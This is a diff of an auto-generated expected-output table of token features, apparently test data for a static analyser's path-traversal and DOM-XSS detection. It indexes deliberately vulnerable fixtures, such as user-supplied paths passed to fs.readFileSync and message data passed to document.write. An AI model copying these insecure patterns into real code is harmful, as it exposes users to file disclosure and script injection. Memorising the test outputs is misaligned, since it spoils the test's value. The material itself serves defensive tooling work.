autogenerated/TaintedPath/typescript.ts:32:13:32:27 | fs.readFileSync | fileImports | fs http path sanitize-filename url | +| autogenerated/TaintedPath/typescript.ts:32:13:32:34 | exceptional return of fs.read ... (path6) | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:13:32:34 | exceptional return of fs.read ... (path6) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/typescript.ts:32:13:32:34 | exceptional return of fs.read ... (path6) | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:13:32:34 | exceptional return of fs.read ... (path6) | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:13:32:34 | exceptional return of fs.read ... (path6) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:32:13:32:34 | fs.read ... (path6) | CalleeFlexibleAccessPath | res.write | | autogenerated/TaintedPath/typescript.ts:32:13:32:34 | fs.read ... (path6) | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:32:13:32:34 | fs.read ... (path6) | contextFunctionInterfaces | | @@ -11773,6 +89426,11 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:32:13:32:34 | fs.read ... (path6) | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:32:13:32:34 | fs.read ... (path6) | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:32:13:32:34 | fs.read ... (path6) | receiverName | res | +| autogenerated/TaintedPath/typescript.ts:32:16:32:27 | readFileSync | contextFunctionInterfaces | | +| autogenerated/TaintedPath/typescript.ts:32:16:32:27 | readFileSync | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/typescript.ts:32:16:32:27 | readFileSync | enclosingFunctionBody | req res path url parse req url true query path res write fs readFileSync path path foo.txt res write fs readFileSync path path2 path path2 res write fs readFileSync path2 path3 path path3 res write fs readFileSync path3 path4 path path4 res write fs readFileSync path4 path5 path path5 clean res write fs readFileSync path5 path6 path path6 clean res write fs readFileSync path6 | +| autogenerated/TaintedPath/typescript.ts:32:16:32:27 | readFileSync | enclosingFunctionName | http.createServer#functionalargument | +| autogenerated/TaintedPath/typescript.ts:32:16:32:27 | readFileSync | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:32:29:32:33 | path6 | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/typescript.ts:32:29:32:33 | path6 | InputArgumentIndex | 0 | | autogenerated/TaintedPath/typescript.ts:32:29:32:33 | path6 | calleeImports | fs | @@ -11782,6 +89440,98 @@ tokenFeatures | autogenerated/TaintedPath/typescript.ts:32:29:32:33 | path6 | enclosingFunctionName | http.createServer#functionalargument | | autogenerated/TaintedPath/typescript.ts:32:29:32:33 | path6 | fileImports | fs http path sanitize-filename url | | autogenerated/TaintedPath/typescript.ts:32:29:32:33 | path6 | receiverName | fs | +| autogenerated/TaintedPath/views.js:1:1:1:0 | this | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:1:1:0 | this | fileImports | | +| autogenerated/TaintedPath/views.js:1:1:1:1 | module | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:1:1:1 | module | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:1:1:1 | module | fileImports | | +| autogenerated/TaintedPath/views.js:1:1:1:6 | module | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:1:1:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:1:1:6 | module | fileImports | | +| autogenerated/TaintedPath/views.js:1:1:1:14 | module.exports | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:1:1:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:1:1:14 | module.exports | fileImports | | +| autogenerated/TaintedPath/views.js:1:1:1:56 | module. ... ams[0]) | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:1:1:56 | module. ... ams[0]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:1:1:56 | module. ... ams[0]) | fileImports | | +| autogenerated/TaintedPath/views.js:1:8:1:14 | exports | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:8:1:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:8:1:14 | exports | fileImports | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | 'arguments' object of anonymous function | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:18:1:56 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | 'arguments' object of anonymous function | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:18:1:56 | 'arguments' object of anonymous function | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:18:1:56 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | (req, r ... ams[0]) | assignedToPropName | exports | +| autogenerated/TaintedPath/views.js:1:18:1:56 | (req, r ... ams[0]) | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:18:1:56 | (req, r ... ams[0]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:18:1:56 | (req, r ... ams[0]) | fileImports | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | exceptional return of anonymous function | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:18:1:56 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | exceptional return of anonymous function | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:18:1:56 | exceptional return of anonymous function | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:18:1:56 | exceptional return of anonymous function | fileImports | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | return of anonymous function | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:18:1:56 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:18:1:56 | return of anonymous function | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:18:1:56 | return of anonymous function | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:18:1:56 | return of anonymous function | fileImports | | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | fileImports | | +| autogenerated/TaintedPath/views.js:1:19:1:21 | req | fileImports | | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | fileImports | | +| autogenerated/TaintedPath/views.js:1:24:1:26 | res | fileImports | | +| autogenerated/TaintedPath/views.js:1:32:1:34 | res | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:34 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:34 | res | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:32:1:34 | res | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:32:1:34 | res | fileImports | | +| autogenerated/TaintedPath/views.js:1:32:1:41 | res.render | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:41 | res.render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:41 | res.render | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:32:1:41 | res.render | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:32:1:41 | res.render | fileImports | | +| autogenerated/TaintedPath/views.js:1:32:1:56 | exceptional return of res.ren ... ams[0]) | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:56 | exceptional return of res.ren ... ams[0]) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/views.js:1:32:1:56 | exceptional return of res.ren ... ams[0]) | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:32:1:56 | exceptional return of res.ren ... ams[0]) | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:32:1:56 | exceptional return of res.ren ... ams[0]) | fileImports | | +| autogenerated/TaintedPath/views.js:1:32:1:56 | res.ren ... ams[0]) | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:56 | res.ren ... ams[0]) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:32:1:56 | res.ren ... ams[0]) | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:32:1:56 | res.ren ... ams[0]) | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:32:1:56 | res.ren ... ams[0]) | fileImports | | +| autogenerated/TaintedPath/views.js:1:36:1:41 | render | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:36:1:41 | render | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:36:1:41 | render | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:36:1:41 | render | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:36:1:41 | render | fileImports | | +| autogenerated/TaintedPath/views.js:1:43:1:45 | req | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:43:1:45 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:43:1:45 | req | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:43:1:45 | req | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:43:1:45 | req | fileImports | | +| autogenerated/TaintedPath/views.js:1:43:1:52 | req.params | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:43:1:52 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:43:1:52 | req.params | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:43:1:52 | req.params | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:43:1:52 | req.params | fileImports | | | autogenerated/TaintedPath/views.js:1:43:1:55 | req.params[0] | CalleeFlexibleAccessPath | res.render | | autogenerated/TaintedPath/views.js:1:43:1:55 | req.params[0] | InputArgumentIndex | 0 | | autogenerated/TaintedPath/views.js:1:43:1:55 | req.params[0] | contextFunctionInterfaces | exports(req, res) | @@ -11790,16 +89540,104 @@ tokenFeatures | autogenerated/TaintedPath/views.js:1:43:1:55 | req.params[0] | enclosingFunctionName | exports | | autogenerated/TaintedPath/views.js:1:43:1:55 | req.params[0] | fileImports | | | autogenerated/TaintedPath/views.js:1:43:1:55 | req.params[0] | receiverName | res | +| autogenerated/TaintedPath/views.js:1:47:1:52 | params | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:47:1:52 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:47:1:52 | params | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:47:1:52 | params | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:47:1:52 | params | fileImports | | +| autogenerated/TaintedPath/views.js:1:54:1:54 | 0 | contextFunctionInterfaces | exports(req, res) | +| autogenerated/TaintedPath/views.js:1:54:1:54 | 0 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/views.js:1:54:1:54 | 0 | enclosingFunctionBody | req res res render req 0 params 0 | +| autogenerated/TaintedPath/views.js:1:54:1:54 | 0 | enclosingFunctionName | exports | +| autogenerated/TaintedPath/views.js:1:54:1:54 | 0 | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:0 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:4 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:4 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:21 | this.ad ... istener | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:21 | this.ad ... istener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:1:21 | this.ad ... istener | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:3:2 | exceptional return of this.ad ... T OK\\n}) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:3:2 | exceptional return of this.ad ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:3:2 | exceptional return of this.ad ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:3:2 | this.ad ... T OK\\n}) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:3:2 | this.ad ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:1:3:2 | this.ad ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:6:1:21 | addEventListener | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:6:1:21 | addEventListener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:6:1:21 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:23:1:31 | 'message' | CalleeFlexibleAccessPath | this.addEventListener | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:23:1:31 | 'message' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:23:1:31 | 'message' | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:23:1:31 | 'message' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:23:1:31 | 'message' | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:1:33 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:1:33 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:1:33 | this | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:1:33 | this | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:1:33 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | 'arguments' object of anonymous function | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | 'arguments' object of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | 'arguments' object of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | exceptional return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | exceptional return of anonymous function | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | exceptional return of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | exceptional return of anonymous function | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | functio ... OT OK\\n} | CalleeFlexibleAccessPath | this.addEventListener | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | functio ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | functio ... OT OK\\n} | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | functio ... OT OK\\n} | contextSurroundingFunctionParameters | (event) | | autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | functio ... OT OK\\n} | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | return of anonymous function | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | return of anonymous function | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | return of anonymous function | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:34:3:1 | return of anonymous function | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:1:43:1:47 | event | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:12 | document | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:12 | document | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:12 | document | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:12 | document | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:12 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:18 | document.write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:18 | document.write | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:18 | document.write | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:18 | document.write | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:18 | document.write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | documen ... t.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | documen ... t.data) | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | documen ... t.data) | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | documen ... t.data) | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | documen ... t.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | exceptional return of documen ... t.data) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | exceptional return of documen ... t.data) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | exceptional return of documen ... t.data) | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | exceptional return of documen ... t.data) | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:5:2:30 | exceptional return of documen ... t.data) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:14:2:18 | write | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:14:2:18 | write | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:14:2:18 | write | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:14:2:18 | write | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:14:2:18 | write | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:24 | event | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:24 | event | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:24 | event | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:24 | event | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:24 | event | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:29 | event.data | CalleeFlexibleAccessPath | document.write | | autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:29 | event.data | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:29 | event.data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | @@ -11808,16 +89646,111 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:29 | event.data | enclosingFunctionName | addEventListener#functionalargument | | autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:29 | event.data | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:2:20:2:29 | event.data | receiverName | document | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:26:2:29 | data | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:26:2:29 | data | contextSurroundingFunctionParameters | (event) | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:26:2:29 | data | enclosingFunctionBody | event document write event data | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:26:2:29 | data | enclosingFunctionName | addEventListener#functionalargument | +| autogenerated/Xss/DomBasedXss/addEventListener.js:2:26:2:29 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:5:4 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:5:4 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:5:4 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:5:21 | this.ad ... istener | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:5:21 | this.ad ... istener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:5:21 | this.ad ... istener | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:7:2 | exceptional return of this.ad ... T OK\\n}) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:7:2 | exceptional return of this.ad ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:7:2 | exceptional return of this.ad ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:7:2 | this.ad ... T OK\\n}) | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:7:2 | this.ad ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:1:7:2 | this.ad ... T OK\\n}) | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:6:5:21 | addEventListener | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:6:5:21 | addEventListener | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:6:5:21 | addEventListener | fileImports | | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:23:5:31 | 'message' | CalleeFlexibleAccessPath | this.addEventListener | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:23:5:31 | 'message' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:23:5:31 | 'message' | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:23:5:31 | 'message' | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/addEventListener.js:5:23:5:31 | 'message' | fileImports | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:5:33 | this | contextFunctionInterfaces | foo(x, event, y)\nonmessage(e)\nonmessage(e)\ntest() | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:5:33 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/addEventListener.js:5:34:5:33 | this | enclosingFunctionBody | data document write 